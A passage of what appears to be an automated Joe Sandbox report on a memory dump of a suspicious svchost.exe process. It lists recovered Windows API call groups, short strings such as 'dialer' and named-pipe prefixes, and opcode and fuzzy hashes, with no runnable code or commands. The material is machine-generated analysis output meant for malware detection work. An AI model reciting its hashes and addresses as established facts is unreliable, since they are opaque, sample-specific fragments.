                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0DF
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023C9FD9C7DE,?,?,?,?,?,?,?,?,0000023C9FD9CF9D,?,?,00000001), ref: 0000023C9FD9D0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: e8c26fe5fe4feb14e3ba4e03a1f9060b6ef82e331d8c99b7b9407e267a680212
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: 7011862370674441FA686FB6955E37962459B447F2F3A4324E879377DADF2CC6829300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: c81ae31f02d2e224a68d0c04c6ddf062c43f5ec167f886d717914fbe70619f4a
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 9081E32370270186FB90AFE5944D3B96690AB85B87F3B4525D92877796DB3CCBC58700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: bcdf0de65a7d2d3d11683321deb0e480384ed9bad8611b56bf596f421dc6149d
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: B631C323313B40E1EE22DF92A4887752394B748BA2F6B0525DD2D2B394EF3EC6D58305
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: fc3ee547b90a58897c853057f39df720ccbe3a45c8b939da15aca02b7eb807e6
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: 9C118F33310B8086E7508F52E84832976A0F788FEAF254225EA6A97794CF7DCA548748
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: f581b2753d3311771d2ef88649b5c3dbc002ea74c6a5500dacb6231ddfec3b34
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: E9115B2B705B41C2EF149F61E40837A76A4FB88F8AF660429DE9917794EF3DC685C708
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction ID: c7858c9595cf304ad0778e2fc3f229bfab6e13f368fba6bf50820e945dd4b50a
                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction Fuzzy Hash: C2D19A37205B8882DB709F46E49836A77A0F3C8B85F214216EACD57BA5DF3DC691CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: 9359298e96b3c04a7ea4b820f75502f3f97a85a75e9c2082bfe538fa6ca21202
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: A131B023702B5582EA15DF97E94877A67A0FB45B86F1A4120DF4867B55EF3CC6E1C300
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                            • String ID: C:\Windows\System32\svchost.exe
                                                                                                                            • API String ID: 3168794593-3822071397
                                                                                                                            • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                                                                            • Instruction ID: ef2c8a893de3dfc8a32d16b7cd1fc9c1132167686339b654e377d72c87c66156
                                                                                                                            • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                                                                            • Instruction Fuzzy Hash: 6B21A06B909BD0CAE352DF259C593AD2BE0F759F4AF2A4016DB45A3247DE2DC6048704
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: 56e012b5d1dc7e002c7adf90bc31e60c974fd27b6bfcadef6d938c98811c32d9
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: C511812330374081FA64AFB2954D33D6242AB857F6F360724E876677DADE2CC6819300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: 13d99b4807abd619a55dff71f34bee12b8a4746c9564a352daa39f4ca56a7e68
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: 5F016922300B4082EB10DF52A84C36A63A1F788FCAFAA4035DE5963754DF3CCA8AC704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: 1f90d7c7ad59199f97c1a7438c6a9a4619e7d053edb22fbc608bcc98bd4b9d08
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: 4451BE337027008AEB54DF65E44CB7937A6F344B8AF628124DA1673788EB79DAC1C705
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: 07a3565f698964cbb3a4654292ca8ae5c348360f6e4fe9823536838693a240fb
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: 9731D133202740C6EB54DF62E84C7293BA5F344B8AF268014EE5A23789DB3DCA80C706
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: 23ca7c8f60db608dac3268c4892bef963bbdddfd80e7d2892e867c6f1acef7e4
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: A2F06223304B41D2EB609F61F8C87696761F758F8AFA58021DA4956958DF7CCB8ECB04
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: f120134d89cc3ff4ac82abde9f44cd907dde6f2fa0f09169b0ae68eb03632b04
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: 65F09663311B04C1EF148F64E44C3796320EB85F66F661219DA7A561E4CF3CC785C304
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: 63bf0631c2ce08038e8afd47d845ce43b19718df71123393761432e8610f9e68
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: 4FF08222304B80C2EA009F53B90C2396264AB48FC6F298030EE5A27B18DF3CC6868704
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction ID: 27460493759cfd513e95e9acbc061ad8e741853e6674a0c4eb1be6d369746711
                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction Fuzzy Hash: 5F02ED33219B8486E7A0CF95F49436AB7A0F3C4785F210125EA8E97BA9DF7CC594CB00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction ID: 13d60bb38955cae3189d8a2bb61af228ad7e90773a2fa293d18278bd4efa4042
                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction Fuzzy Hash: 6761CC3751AB44C6E760CF55E44832AB7E0F388786F210126EA8E57BA8DB7CC695CF00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: a6d18e22d9c748128799939e0654a87f56c25303a8cede26c8329d518403cd37
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 2C11E323A10F4051F6A61F68E45D37511806B7BBBAF3B4A34E976276F6CB2CCB405308
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1452528299-0
                                                                                                                            • Opcode ID: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                                                            • Instruction ID: 7cd8ba41c2925395cb7c9359367532a4a56c2306d61c1e992674a85071185b21
                                                                                                                            • Opcode Fuzzy Hash: 46c896f13dff0714c7ccebb8ca9383bb675cc38bcf091c92c481f4a556b8b138
                                                                                                                            • Instruction Fuzzy Hash: A211632330239082FE549FA6984C37962956B48BE3F364724D936377D9DA2CCA81C701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 0bebfacf85e04dc8df566765b1bb9a45dc94805908403f3c6b4d7d15f2017294
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: C461583B602B848AEB20DFA5D4843AD77B0F348B99F254215EF4927B98DB38D695C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: b5b3cd2e7d2b3ba65c0c38fc053bdc294db5e1aadc0f0551ef11afe4c2e778d2
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 9451B07B2013808AFB748F95948837977A0F355BA6F265216EB9967BD5CB3CC6D0C700
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: d2a503851be96b6516d99fb73f83dfb610c96ca901761488bc4f8c611d374a52
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: A7D10333714B8089E711CFBAD5483AC3BB1F355B9AF214216CE5DA7B99DA38C646C344
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: dfac7770a03030c8138235460075494dc8b96b5442b412831c4990e57e6e5698
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: 8C91BF7370075086F7619F6695883BD3BA0B706F8BF264109DE0A77A88DB3CC682C708
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: 4ed76368ea000a64330ec930436fe3a4810d52bf42b8390d9f0f35c83193dfce
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction Fuzzy Hash: A9113023711F0189EB00CF70E8593B833A4F759B59F550E21EA6D567A8DF7CC2A88380
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: 0c33aa86fb6af781ab4bd2801129ac058fc1aff8e06ccd9e83e02b0cf9a38ee3
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: 1871B23720178185E7299EA5984C3BA77A4F78BB87F660116DD0A73F89DE39C785C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: da9330c3968a2f4648570f24bcb8dedcce468af78ba686aeb91ff33026581370
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: BD113D37215B8082EB618F15F44436A77E5F788B99F694220EE8C17758DF3CC691CB04
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000032.00000002.3320769494.0000023C9FD90000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023C9FD90000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_50_2_23c9fd90000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: fb274fbcc73c847d3c6e09d570d25983daaf9cd5edc6c7e414eda49a85b8252f
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: 9B113D26602B4481EA55DFA6A40833967A1FB89FC6F2A4124DE4D67765DE3CC5828300